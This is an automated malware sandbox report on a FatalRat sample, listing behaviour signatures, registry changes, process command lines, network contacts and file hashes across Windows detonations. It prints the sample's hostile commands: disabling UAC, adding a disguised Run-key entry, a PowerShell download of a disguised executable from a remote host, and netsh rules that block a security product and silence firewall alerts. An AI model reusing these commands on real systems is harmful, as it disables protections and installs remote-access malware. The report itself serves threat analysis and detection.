Analysis Overview
SHA256
b17337db64b6ab60e969cec89c36058baf5e100c25684bda9beb0afa1c342b4d
Threat Level: Known bad
The file 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk was found to be: Known bad.
Malicious Activity Summary
FatalRat
Fatalrat family
UAC bypass
Fatal Rat payload
Blocklisted process makes network request
Modifies Windows Firewall
Downloads MZ/PE file
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Adds Run key to start application
Drops desktop.ini file(s)
Command and Scripting Interpreter: PowerShell
Checks installed software on the system
System Location Discovery: System Language Discovery
Unsigned PE
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
Modifies registry class
Checks processor information in registry
Suspicious behavior: AddClipboardFormatListener
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2025-02-23 12:47
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2025-02-23 12:47
Reported
2025-02-23 12:50
Platform
win10v2004-20250217-en
Max time kernel
146s
Max time network
151s
Command Line
Signatures
FatalRat
Fatalrat family
UAC bypass
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
Fatal Rat payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\programdata\20250223024745\Agghosts.exe | N/A |
| N/A | N/A | C:\Users\Public\Videos\bin.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-GAL4S.tmp\bin.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\programdata\20250223024745\Agghosts.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleUpdata_Service = "C:\\programdata\\lnk\\dick.lnk" | C:\Windows\System32\reg.exe | N/A |
Checks installed software on the system
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-GAL4S.tmp\bin.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\programdata\20250223024745\Agghosts.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Public\Videos\bin.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\programdata\20250223024745\Agghosts.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\programdata\20250223024745\Agghosts.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg\URL Protocol | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg\DefaultIcon | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tonsite\shell | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tonsite\shell\open | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tg\shell\open\command | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg\shell\open\command | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite\ = "URL:TonSite Link" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg\shell\open | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tonsite\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tonsite\shell\open\command | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tg\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg\ = "URL:Telegram Link" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg\shell | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite\URL Protocol | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tg\DefaultIcon | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tg\shell\open | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tonsite | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tonsite\DefaultIcon | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite\shell\open | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tg\shell | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tonsite\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite\DefaultIcon | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite\shell | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite\shell\open\command | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tg | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tg\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\programdata\20250223024745\Agghosts.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-GAL4S.tmp\bin.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe
"C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\20250223024745\1.bat" "
C:\programdata\20250223024745\Agghosts.exe
"C:\programdata\20250223024745\Agghosts.exe"
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Videos\download_and_run.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\20250223024745\fhq.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Block Program Network Access" dir=in action=block program="" enable=yes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://baba-1336130708.cos.ap-tokyo.myqcloud.com/tsetup-x64.5.11.1.exe', 'C:\Users\Public\Videos\bin.exe')"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Block Program Network Access" dir=out action=block program="" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Block Program Network Access2" dir=in action=block program="safemon\360tray.exe=360Safe.exe" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Block Program Network Access2" dir=out action=block program="safemon\360tray.exe=360Safe.exe" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state on
C:\Windows\system32\netsh.exe
netsh advfirewall set privateprofile settings inboundusernotification disable
C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile settings inboundusernotification disable
C:\Windows\system32\netsh.exe
netsh advfirewall set domainprofile settings inboundusernotification disable
C:\Users\Public\Videos\bin.exe
"C:\Users\Public\Videos\bin.exe"
C:\Users\Admin\AppData\Local\Temp\is-GAL4S.tmp\bin.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GAL4S.tmp\bin.tmp" /SL5="$7023C,46193823,827904,C:\Users\Public\Videos\bin.exe"
C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe
"C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe"
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | baba-1336130708.cos.ap-tokyo.myqcloud.com | udp |
| JP | 43.128.240.48:443 | baba-1336130708.cos.ap-tokyo.myqcloud.com | tcp |
| N/A | 127.0.0.1:49418 | | tcp |
| US | 8.8.8.8:53 | www.baidu.com | udp |
| HK | 103.235.46.96:80 | www.baidu.com | tcp |
| US | 8.8.8.8:53 | spoutry.it.com | udp |
| JP | 118.107.15.176:8081 | spoutry.it.com | tcp |
| JP | 43.128.240.48:443 | baba-1336130708.cos.ap-tokyo.myqcloud.com | tcp |
| NL | 149.154.167.51:443 | | tcp |
| NL | 95.161.76.100:443 | | tcp |
| NL | 149.154.167.51:80 | 149.154.167.51 | tcp |
| NL | 95.161.76.100:80 | 95.161.76.100 | tcp |
| US | 8.8.8.8:53 | td.telegram.org | udp |
| NL | 149.154.167.99:443 | td.telegram.org | tcp |
| NL | 149.154.167.92:443 | | tcp |
| NL | 149.154.167.41:443 | | tcp |
| NL | 149.154.167.41:80 | 149.154.167.41 | tcp |
| NL | 149.154.167.92:80 | 149.154.167.92 | tcp |
Files
memory/4888-11-0x0000000140000000-0x0000000140419000-memory.dmp
memory/4888-12-0x00000145A6830000-0x00000145A6C44000-memory.dmp
memory/4888-13-0x0000000140000000-0x0000000140419000-memory.dmp
memory/4888-14-0x00000145A6270000-0x00000145A6271000-memory.dmp
C:\ProgramData\20250223024745\Agghosts.exe
| MD5 | 2a24dcd41bc3c5b5f7eceda525786578 |
| SHA1 | 7e898f9ee5a97a1a261326f0168e8de44dcf8af4 |
| SHA256 | 169e9e4b23878035551455f4e5dbd01ece204e59fe75361680e8786998059ca7 |
| SHA512 | aaded4c72d3fa77eefd9d4b098288dd6923bd79813466d93313d6acb00fea9bb90248fff92cc89a625c60ae3b7cc1c27e8bb178fdac624ec896267da57b9fd6a |
C:\Users\Public\Downloads\20250223024745\1.bat
| MD5 | fa42ebb1071abc0e618c296ea2cf71a6 |
| SHA1 | 9e0c0737b0e37b3e821d011eecd9b0c7c9f2a15a |
| SHA256 | 395f835731d25803a791db984062dd5cfdcade6f95cc5d0f68d359af32f6258d |
| SHA512 | 0ed9919675c224201996caeeecf625a1db00a70af5d3ba135dc3d6fa16bfcc562426c813e21b4e861f04d312635be3528d79b5c49b23e78161f2b051fa9aaf05 |
C:\ProgramData\lnk\2.lnk
| MD5 | b7eb81f993f4ceeb2da553567e098525 |
| SHA1 | 69ad5eca3d5dfce012dbb812cb91a5491d082bcd |
| SHA256 | 351a3f0aaaef00a71797e390cee3603283d7baac8d97fd1161245e82cded294b |
| SHA512 | 047d214720203198cc7efb49a1f4771b7f27c8e1a3459ac1440ef37720b927f1e74c27ac8bd7ce7370fea28bc5a84ba499ebc5479ceb4d848186c8da60c968cf |
C:\programdata\20250223024745\libcef.dll
| MD5 | b7f8c3416cdfd6f46c790da064f66099 |
| SHA1 | d7ae9a3d49bbf1981e7d6604128e18b6cd160bd6 |
| SHA256 | b9edf03447cf402e24da384c146c9d1536871a47518c795c4aea6550e3abd94d |
| SHA512 | 24272954e57f4f4f81dad90469e84946549e3441ba599f8b819d069b803687b3da35f449c0f18755352dba208d6d63af1d6b53c0a56adbd36540b1537bb99dc7 |
C:\programdata\20250223024745\Ensup.log
| MD5 | 2fd94f6e1d71454d716a126f0d7450ac |
| SHA1 | 5d966df95c741880089e9078af921a22216516ec |
| SHA256 | a599cbb05b69328655a7a0afc2644ed607c30a05edfb8fd6be2ea920c25b54b5 |
| SHA512 | 340107b69fc49b8fe1acf37a3a6e40c4b7206cf3ae069fea6f4ba702a733401e1feef55e1d858b3529764bcd0ba371ef552f5838444b65b62545e1da150f9bb2 |
memory/1828-55-0x0000000001510000-0x0000000001539000-memory.dmp
memory/4888-67-0x0000000140000000-0x0000000140419000-memory.dmp
C:\Users\Public\Videos\download_and_run.bat
| MD5 | a90ccfd040d774b547f7d258b8e03661 |
| SHA1 | c46e353d34723f9393482974a516d51dfb52440d |
| SHA256 | d852cfc4107e9ce5bec7349ef180366bbb4fe0878e725325a2b844f93a1ac1e2 |
| SHA512 | bdc816781c44b6e9bbc8207a3c0466a45397cf7815f267add21abe243bf138b5bae7ffec867433bf249e139b726413f68b7002f541c89ae1a25bd1e6980abfd7 |
C:\Users\Public\Downloads\20250223024745\fhq.bat
| MD5 | 3a7cb580bd340505f6dc5b4c829a3eca |
| SHA1 | 21cc730517d74fa1d13316d7e0d817f3bd710906 |
| SHA256 | 1c1528b546aa29be6614707cbe408cb4b46e8ed05bf3fe6b388b9f22a4ee37e2 |
| SHA512 | c224fa676542b90f8fc990e574028af664dced61612855290fb23ce4acad2d6b9043e901365939106b591b6746b3e4ddada15eede88a947051e9d8083194e630 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0qpalyu4.ec3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3640-79-0x0000017AD3730000-0x0000017AD3752000-memory.dmp
C:\Users\Public\Videos\bin.exe
| MD5 | 06eaa3263801f4d695c3727834ffbca5 |
| SHA1 | 58031db0039cf00a1fe738e55ee2fca35558c4fd |
| SHA256 | 97969d6e01ee37a16f4f7f64e6166f169bedfe95190f48d426693d4b95e8e8ff |
| SHA512 | 7b03899c6ce403172eb6d159e142b8ac25ef3aa6eb7f56abd205657d13832eb5b8ee61408b8d7a6f3f1c57de7fcc2565ce2ce9ecb4e54611f4c48098a870b6b3 |
memory/4188-87-0x0000000000EF0000-0x0000000000FC8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-GAL4S.tmp\bin.tmp
| MD5 | 2e90747fe82d7271fbe97ea022fd5173 |
| SHA1 | 6164bc0ec0c908e9159a0c5d558945d7974e11c1 |
| SHA256 | bbec6b26c13b8ebfd01789a8248c6a45646134daf1ef998dbb885ec59157e6b4 |
| SHA512 | d9a797861f8a7fc966a0a00e1719734a23c95c39aca9d70322d09274119267c8bd0d86a3ec468a7f493422769f89a48469f1e33a6a1dd2d39cb30cfb4df6fa44 |
memory/4188-93-0x0000000000EF0000-0x0000000000FC8000-memory.dmp
memory/3528-94-0x0000000000D20000-0x0000000001057000-memory.dmp
memory/3528-96-0x0000000000D20000-0x0000000001057000-memory.dmp
memory/3528-101-0x0000000000D20000-0x0000000001057000-memory.dmp
C:\Users\Admin\AppData\Roaming\Telegram Desktop\modules\x64\d3d\d3dcompiler_47.dll
| MD5 | a7349236212b0e5cec2978f2cfa49a1a |
| SHA1 | 5abb08949162fd1985b89ffad40aaf5fc769017e |
| SHA256 | a05d04a270f68c8c6d6ea2d23bebf8cd1d5453b26b5442fa54965f90f1c62082 |
| SHA512 | c7ff4f9146fefedc199360aa04236294349c881b3865ebc58c5646ad6b3f83fca309de1173f5ebf823a14ba65e5ada77b46f20286d1ea62c37e17adbc9a82d02 |
memory/3528-126-0x0000000000D20000-0x0000000001057000-memory.dmp
memory/4188-127-0x0000000000EF0000-0x0000000000FC8000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2025-02-23 12:47
Reported
2025-02-23 12:50
Platform
win7-20241023-en
Max time kernel
119s
Max time network
152s
Command Line
Signatures
FatalRat
Fatalrat family
UAC bypass
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
Fatal Rat payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
